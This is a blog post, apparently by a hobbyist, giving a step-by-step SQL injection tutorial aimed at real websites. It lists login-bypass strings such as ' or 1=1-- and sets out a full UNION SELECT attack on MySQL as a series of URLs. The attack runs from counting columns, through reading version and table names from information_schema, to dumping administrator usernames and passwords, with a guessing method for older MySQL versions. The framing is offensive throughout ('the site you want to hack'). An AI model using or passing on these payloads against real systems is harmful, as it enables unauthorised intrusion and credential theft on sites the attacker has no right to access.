Today i am posting this article after so many days because i was busy in placement like stuffs.
Hello guys My last post was on "prevention against SQLI" so i decided to write about SQL Injection attack :P .Here i will explain every thing briefly but make yourself sure that you wont use this information in wrong things As i don't take any responsibility of what you guys do with this information its all up to you :)
So lets start Today i will explain you about
1 STRING INJECTION : To bypass login forms authentication.
2 UNION SELECT
3 BLIND SQLI
4 ERROR BASED SQL INJECTION /* in mssql i have not tried this one but will post about this also*/
1. So Lets start with first one. This is so simple and even any one can try his/her hands in bypassing login forms security using this method.In this method first you have to search admin login page of the site you want to hack. You can find it using your intelligence or using some free available tools . Now after getting login
page all you have to do is just enter administrator's username and password and you are done.
Lets move on to second method.....hahahaha ......dont get angry...still we have to do some task after getting login page because we dont have admin's username and password.
Now if you are lucky enough then your target may be vulnurable to this attack . All you have to do it ,write following information in form
USERNAME : admin , administrator ,master ,manager ,targetsite_admin ,%admin% or you can try some general username in most of the cases these will work depending on your luck :P
PASSWORD : In password field use any of these strings.
' or 1=1--
" or 1=1--
or 1=1--
1'or'1'='1
' or 'a'='a
" or "a"="a
') or ('a'='a
") or ("a"="a
Finally you are done. If your target is vulnerable you will get access for sure.
2. Union method :Now move towards some real work. In this you have to do everything manually by using your mind and skills , Lets start the job
>>> >>> >>>
Let's start with union Attack :
Our aim is to find TABLE NAME , COLUMN NAME and then username and password
=> http://targetsite.com/index.php?id=1 order by 10--
^ This gives me an error
keep trying
=> http://targetsite.com/index.php?id=1 order by 7--
^ again error arggg!!!! i hate it
keep trying
=> http://targetsite.com/index.php?id=1 order by 5--
the page is Loading normally.........woooooohh
It means, Number of columns = 5
Now the next part-
using union select statement.
=> http://targetsite.com/index.php?id=1 union all select 1,2,3,4,5--
If it doesn't gives you anything, change the first part of the query to a negative value.
=> http://targetsite.com/index.php?id=-1 union all select 1,2,3,4,5--
It'll show some number on you screen. Lets say it is 2. Now we know that column 2 will echo data back to us. :D
Now getting Mysql version
=> http://targetsite.com/index.php?id=-1 union all select 1,@@version,3,4,5--
If you do not get with this try this-
=> http://targetsite.com/index.php?id=-1 union select 1,version()),3,4,5--
Now you will get get the version name
it can be-
==> 5+ /* version above 5*/
==>5> /*version below 5 */
Now Extracting table for version 5+ :
=> http://targetsite.com/index.php?id=-1 union all select 1,group_concat(table_name),3,4,5 from information_schema.tables--
It'll show a lot of tables, if you want to get the admin privilege in order to hack the site then you are looking for "admin" table.
Now I got the Tables names & I need to extract the column names from them so the query will be-
=> http://targetsite.com/index.php?id=-1 union all select 1,group_concat(column_name),3,4,5 from information_schema.columns where table_name=admin--
This will show you the column names inside the table Admin. if it gives you an error you need to change the text value of admin to mysql char.Use hackbar, a Firefox addon to do so. OR use any other tool OR write it by your qwn if you know ascii value of every character.
so char of admin is =>CHAR(97, 100, 109, 105, 110)
therefore the query will be-
=> http://targetsite.com/index.php?id=-1 union all select 1,group_concat(column_name),3,4,5 from information_schema.columns where table_name=CHAR(97, 100, 109, 105, 110)--
It will show you many tables but we only need admin table and password table
=> http://targetsite.com/index.php?id=-1 union all select 1, group_concat (user_name,0x3a,user_password) ,3,4,5 from admin--
/*where 0x3a is the hex value of => : (colon) */
/*where 0x3a is the hex value of => : (colon) */
wooooohhh its tym to party you got the admin name and password
password can also be encrypted. So you can use decrypters to decode them .
This was all for Mysql 5+
=============================================================
=============================================================
Let's Start with mysql version below 5 :
Version 4 or below 5 does not contain any ==> Information_schema
This method is all about guessing :p
We know the number of columns that is 5.
=> Let's Start guessing the table:
=> http://targetsite.com/index.php?id=-1 union all select 1,2,3,4,5 from users--
^ got error ...give one more try
=> http://targetsite.com/index.php?id=-1 union all select 1,2,3,4,5 from Admin--
^ Suppose this does not gives me error it means it worked and we got table name
==> Next part is Guessing the columns:
as we had done earlier & had found the vulnerable column is 2...so lets proceed further.
=> http://targetsite.com/index.php?id=-1 union all select 1,user,3,4,5 from admin--
^ got error. shit!!!!!!
=> http://test.com/index.php?id=-1 union all select 1,username,3,4,5 from admin--
^ no error.....ya i got the column name
==> let's guess the password column now
=> http://test.com/index.php?id=-1 union all select 1,pass,3,4,5 from admin--
^ got an error one more try-
=> http://targetsite.com/index.php?id=-1 union all select 1,password,3,4,5 from admin--
We did it we got the password column successfuly so cheers
This is end of union method for mysql you can try the same for mssql. Wait for my next post i will post about Blind injection and error based both :)
No comments:
Post a Comment